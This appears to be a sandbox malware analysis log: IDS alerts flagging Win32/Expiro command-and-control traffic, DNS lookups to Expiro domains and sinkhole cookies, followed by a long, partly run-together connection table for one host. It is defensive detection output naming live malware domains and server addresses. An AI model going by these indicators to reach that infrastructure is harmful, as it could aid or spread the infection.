2024-11-18T09:57:35.196947+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.7 | 50013 | TCP
2024-11-18T09:57:40.703360+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.246.200.160 | 80 | 192.168.2.7 | 50018 | TCP
2024-11-18T09:57:40.703360+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.246.200.160 | 80 | 192.168.2.7 | 50018 | TCP
2024-11-18T09:57:48.496579+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 35.164.78.200 | 80 | 192.168.2.7 | 50025 | TCP
2024-11-18T09:57:48.496579+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 35.164.78.200 | 80 | 192.168.2.7 | 50025 | TCP
2024-11-18T09:57:49.313279+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.7 | 50026 | TCP
2024-11-18T09:57:49.313279+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.7 | 50026 | TCP
2024-11-18T09:57:58.560314+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 50028 | 82.112.184.197 | 80 | TCP
2024-11-18T09:58:08.560846+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.211.97.45 | 80 | 192.168.2.7 | 50043 | TCP
2024-11-18T09:58:08.560846+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.211.97.45 | 80 | 192.168.2.7 | 50043 | TCP
2024-11-18T09:58:15.584854+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.7 | 50054 | TCP
2024-11-18T09:58:15.584854+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.7 | 50054 | TCP
2024-11-18T09:58:39.026226+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.254.94.185 | 80 | 192.168.2.7 | 50091 | TCP
2024-11-18T09:58:39.026226+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.254.94.185 | 80 | 192.168.2.7 | 50091 | TCP
2024-11-18T09:58:39.336228+0100 | 2051651 | ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) | 1 | 192.168.2.7 | 61118 | 1.1.1.1 | 53 | UDP
2024-11-18T09:58:58.230245+0100 | 2051651 | ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) | 1 | 192.168.2.7 | 50242 | 1.1.1.1 | 53 | UDP
2024-11-18T09:58:59.043100+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.246.231.120 | 80 | 192.168.2.7 | 50124 | TCP
2024-11-18T09:58:59.043100+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.246.231.120 | 80 | 192.168.2.7 | 50124 | TCP
2024-11-18T09:59:02.553719+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.7 | 50132 | 72.52.178.23 | 80 | TCP
2024-11-18T09:59:05.904050+0100 | 2051653 | ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) | 1 | 192.168.2.7 | 53758 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:12.740525+0100 | 2051654 | ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) | 1 | 192.168.2.7 | 55773 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:17.857629+0100 | 2051653 | ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) | 1 | 192.168.2.7 | 58751 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:17.880138+0100 | 2051653 | ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) | 1 | 192.168.2.7 | 58751 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:21.215052+0100 | 2051650 | ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) | 1 | 192.168.2.7 | 53053 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:21.247295+0100 | 2051650 | ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) | 1 | 192.168.2.7 | 53053 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:23.892905+0100 | 2051654 | ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) | 1 | 192.168.2.7 | 52819 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:31.371397+0100 | 2051650 | ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) | 1 | 192.168.2.7 | 65464 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:31.395946+0100 | 2051650 | ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) | 1 | 192.168.2.7 | 65464 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:42.932074+0100 | 2051652 | ET MALWARE DNS Query to Expiro Domain (napws .biz) | 1 | 192.168.2.7 | 55589 | 1.1.1.1 | 53 | UDP
2024-11-18T09:59:51.959681+0100 | 2051652 | ET MALWARE DNS Query to Expiro Domain (napws .biz) | 1 | 192.168.2.7 | 59218 | 1.1.1.1 | 53 | UDP
2024-11-18T10:00:01.256401+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.7 | 53926 | 1.1.1.1 | 53 | UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:03.724220+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.760112172.234.222.14380TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:03.732796+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7625101.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:07.633314+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7519801.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:09.051307+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7571651.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                      2024-11-18T10:00:09.083433+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7571651.1.1.153UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:13.937809944 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140566111 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140620947 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140656948 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140683889 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.140754938 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259717941 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259742975 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259824991 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259838104 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.259934902 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.404936075 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.404969931 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.405030012 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.405056000 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.405095100 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.405116081 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611000061 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611032009 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611093044 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611140966 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611162901 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.611219883 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728318930 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728353977 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728413105 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728439093 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728461981 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.728482962 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995064020 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995081902 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995129108 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995191097 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995220900 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.995235920 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:14.997317076 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.080708981 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.080739021 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.081012964 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.081036091 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.081089020 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.225877047 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.225907087 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.226061106 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.226130962 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.226195097 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.432327986 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.432339907 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.432497978 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.432498932 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.432532072 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.432570934 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.432621956 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.657161951 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.657174110 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:15.657213926 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.827061892 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.827089071 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.827313900 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.827363014 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.827424049 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.944179058 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.944207907 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.944322109 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.944351912 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:17.944401026 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.061300039 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.061340094 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.061399937 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.061413050 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.061463118 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.061486006 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.295871973 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.295886993 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.295917988 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.295974970 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296003103 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296042919 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296042919 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296130896 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296159029 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296200991 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296209097 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296250105 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.296250105 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.413770914 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.413800001 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.413903952 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.413927078 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.413979053 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.541795015 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.541830063 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.541960001 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.541980028 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.542040110 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.713499069 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.713557959 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.713649988 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.713663101 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.713782072 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.776180029 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.776215076 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.776295900 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.776307106 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.776340961 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.776352882 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.893606901 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.893632889 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.893707037 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.893728971 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:18.893771887 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:19.010611057 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.587618113 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.587675095 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.587682962 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.587729931 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.789227962 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.789256096 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.789391041 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.789414883 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.789467096 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.907156944 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.907181025 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.907290936 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.907334089 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:20.907381058 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.023789883 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.023813009 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.023895025 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.023914099 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.023963928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.140921116 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.140944004 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.141042948 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.141062021 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.141110897 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.257913113 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.257936001 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.257994890 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.258009911 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.258024931 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.258050919 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.375164032 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.375189066 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.375298977 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.375332117 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.375483036 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.492321968 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.492342949 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.492432117 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.492448092 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.492496967 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.695980072 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696002960 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696095943 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696115971 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696166039 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696326971 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696343899 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696382046 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696389914 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696418047 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.696435928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.964746952 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.964812994 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.964886904 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.964905024 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:21.964948893 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.637347937 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.637372971 CET44349700198.252.105.91192.168.2.7
